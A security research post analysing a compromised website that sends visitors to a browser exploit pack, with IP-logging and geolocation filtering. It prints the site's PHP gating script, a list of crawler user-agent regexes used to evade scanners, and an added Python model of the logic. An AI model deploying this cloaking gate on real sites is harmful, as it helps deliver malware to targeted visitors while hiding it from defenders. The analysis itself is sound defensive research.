It is a widely known fact that the majority of infectious code (iframes redirecting to browser exploit packs, BEPs) is hosted on free domains or on compromised websites that are sold in the underground community. In my earlier presentation at the Virus Bulletin Conference (HERE), I discussed the IP Address Logging Detection Trick (IPLDT), which basically allows attackers to restrict the spread of malware to a dedicated audience on the Internet. For more about BEPs, read the previous research papers:
- Styx Exploit Pack - http://secniche.org/released/VB_Styx_Exploit_Pack.pdf
- Sweet Orange Exploit Pack - http://secniche.org/released/VB_SWEET_ORANGE_EXP_AKS_RB_RJE.pdf
A simple work flow is discussed below:
- User visits the website serving infectious code.
- The infected website triggers custom code hosted by the attacker to check the following:
  - Geo-location of the IP address: if the geo-location of the end-user's IP address maps to one of the locations listed in the configuration file, the user's browser is redirected to the BEP for exploitation.
  - Whether the exploit code has already been served to this IP: if the database shows that the IP has already been served, the end-user's IP address is filtered and the BEP URL is not served.
- When the user's browser lands on the BEP URL, a specific vulnerability in the browser (built-in components or plug-ins) is exploited to download malware.
In addition, filters are added for various automated spiders to restrict the access of bots, which prevents the malicious website or its links from appearing in search results. Recently, I was analyzing a malicious website that was serving infectious code and redirecting the user's browser to a BEP to download malware by exploiting a specific vulnerability. However, the name of the exploit kit is not known. This analysis concentrates on the compromised website that redirects the user's browser to the BEP.
A code snippet extracted from the infected website is presented below. It clearly shows that the user-agent and IP geo-location ("CH" = Switzerland, "DE" = Germany) are used as filters on the incoming HTTP traffic. Additionally, two files are generated as databases of the IP addresses that were either successful (sbase.txt) or unsuccessful (sbase_bad.txt) in getting the direct link to the BEP URL from the infected website.
<?php
error_reporting(0); ini_set('display_errors',0);   // hide PHP errors from visitors
// Match the visitor's user-agent and IP against regex lists of known crawlers.
function is_bot($myuagent, $myip) {
    $uagents = file('uagents.txt',FILE_IGNORE_NEW_LINES);
    $ips = file('ips.txt',FILE_IGNORE_NEW_LINES);
    foreach ($uagents as $exp) {
        if (preg_match('/'.$exp.'/i',$myuagent)) {
            return true;
        }
    }
    foreach ($ips as $exp) {
        if (preg_match('/'.$exp.'/',$myip)) {
            return true;
        }
    }
    return false;
}
$countries = "CH;DE";
// page with the exploit
$good_link = "./banner.php";
// decoy page
$bad_link = "./blabla.php";
//
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
$file = fopen("./sbase.txt","a+");       // IPs already served the BEP link, one per line
$file2 = fopen("./sbase_bad.txt","a+");  // IPs given the decoy, as "ip|user-agent"
$already_showed = FALSE;
// One-visit-per-IP check: each line of sbase.txt is "ip\r\n".
while (!feof($file)) {
    $buffer = fgets($file);
    $ip2 = $ip."\r\n";
    if(strcmp($buffer,$ip2)==0) $already_showed = TRUE;
}
// Note: the crawler check reads a 'useragent' request parameter, not the $ua header above.
if (is_bot($_REQUEST['useragent'], $ip)) $already_showed = TRUE;
if($already_showed) {
    include($bad_link);
} else {
    require_once('./geoip/geoip.inc');
    $gi = geoip_open("./geoip/GeoIP.dat",GEOIP_STANDARD);
    $ccode = explode(";",$countries);
    $show = FALSE;
    foreach($ccode as $value) {
        // Serve the exploit page only to CH/DE visitors whose UA says MSIE, Opera or Firefox.
        if(geoip_country_code_by_addr($gi,$ip) == $value && preg_match('/(msie|opera|firef)/i', $ua)) {
            $show = TRUE;
            fwrite($file,$ip."\r\n");
        }
    }
    geoip_close($gi);
    if($show) {
        include($good_link);
    } else {
        fwrite($file2,$ip."|".$ua."\r\n");
        include($bad_link);
    }
}
fclose($file);
?>
On checking the two files, the following stats were gathered:
- Approximately 5881 unique IP addresses (users' browsers) were successfully redirected to the BEP.
- Approximately 15737 unique IP addresses (users' browsers) were restricted from visiting the BEP.
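To make the gate logic and the two log formats concrete, here is an added Python model of the same decision sequence (not code from the infected site or from the author): the GeoIP lookup is replaced by a constructed IP-to-country table, ips.txt is not shown on the page so only the user-agent half of is_bot() is modelled, and the parser counts unique IPs in the formats the snippet writes to sbase.txt and sbase_bad.txt.

```python
import re

# A few patterns copied from the uagents.txt list shown on this page.
BOT_PATTERNS = [r"Python", r"libwww-perl", r"Yahoo!\s*Slurp", r"Wget", r"Java"]
COUNTRIES = {"CH", "DE"}                       # $countries = "CH;DE"
BROWSER_RE = re.compile(r"(msie|opera|firef)", re.I)

# Constructed IP -> country table standing in for GeoIP.dat (RFC 5737 test addresses).
GEO = {"198.51.100.7": "CH", "203.0.113.9": "DE", "192.0.2.4": "US"}


def is_bot(ua):
    """Mirror of the PHP is_bot(): user-agent patterns are matched case-insensitively.
    The ips.txt patterns are not on the page, so that half is omitted here."""
    return any(re.search(p, ua, re.I) for p in BOT_PATTERNS)


def gate(ip, ua, served):
    """Return 'exploit' or 'decoy' for one request, in the PHP snippet's check order:
    seen-before / crawler -> decoy; target country AND MSIE/Opera/Firefox -> exploit
    (and the IP is recorded in `served`, the in-memory stand-in for sbase.txt).
    The PHP passes $_REQUEST['useragent'] to is_bot(); this model uses the UA header."""
    if ip in served or is_bot(ua):
        return "decoy"
    if GEO.get(ip) in COUNTRIES and BROWSER_RE.search(ua):
        served.add(ip)
        return "exploit"
    return "decoy"


def unique_ips(sbase_text, sbase_bad_text):
    """Count unique IPs in the two logs the snippet writes:
    sbase.txt is one IP per line, sbase_bad.txt is 'ip|user-agent' per line."""
    good = {line.strip() for line in sbase_text.splitlines() if line.strip()}
    bad = {line.split("|", 1)[0] for line in sbase_bad_text.splitlines() if line.strip()}
    return len(good), len(bad)


# Constructed sample requests and log contents for a stand-alone run.
FIREFOX = "Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0"
IE11 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
SBASE = "198.51.100.7\r\n203.0.113.9\r\n198.51.100.7\r\n"
SBASE_BAD = "192.0.2.4|Python-urllib/2.7\r\n192.0.2.4|Wget/1.14\r\n"

if __name__ == "__main__":
    seen = set()
    print(gate("198.51.100.7", FIREFOX, seen))   # exploit: CH + Firefox, first visit
    print(gate("198.51.100.7", FIREFOX, seen))   # decoy: same IP again
    print(gate("203.0.113.9", IE11, seen))       # decoy: IE11's UA string lacks "msie"
    print(gate("203.0.113.9", "Python-urllib/2.7", seen))  # decoy: crawler pattern
    print(unique_ips(SBASE, SBASE_BAD))          # (2, 1)
```

Note that the browser regex only admits user-agents containing "msie", "opera" or "firef", so IE11 (Trident, no "msie" token) and Chrome visitors from the target countries end up in sbase_bad.txt rather than being redirected.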
The list of banned user-agents (regex patterns) is shown below:
Ask\s*Jeeves
HP\s*Web\s*PrintSmart
HTTrack
IDBot
Indy\s*Library#
ListChecker
MSIECrawler
NetCache
Nutch
RPT-HTTPClient
rulinki\.ru
Twiceler
WebAlta
Webster\s*Pro
www\.cys\.ru
Wysigot
Yahoo!\s*Slurp
Yeti
Accoona
CazoodleBot
CFNetwork
ConveraCrawlerDISCo
Download\s*Master
FAST\s*MetaWeb\s*Crawler
Flexum\s*spider
Gigabot
HTMLParser
ia_archiver
ichiro
IRLbot
Java
km\.ru\s*bot
kmSearchBot
libwww-perl
Lupa\.ru
LWP::Simple
lwp-trivial
Missigua
MJ12bot
msnbot
msnbot-media
Offline\s*Explorer
OmniExplorer_Bot
PEAR
psbot
Python
rulinki\.ru
SMILE
Speedy
Teleport\s*Pro
TurtleScanner
User-Agent
voyager
Webalta
WebCopier
WebData
WebZIP
Wget
Yandex
Yanga
Yeti
msnbot
spider
yahoo
jeeves
google
altavista
scooter
av\s*fetch
asterias
spiderthread revision
sqworm
ask
lycos.spider
infoseek sidewinder
ultraseek
polybot
webcrawler
robozill
gulliver
architextspider
yahoo!\s*slurp
charlotte
ngb
Inference: BEPs extensively use IPLDT to manage infections and to ensure the malicious code is served only to the targeted countries.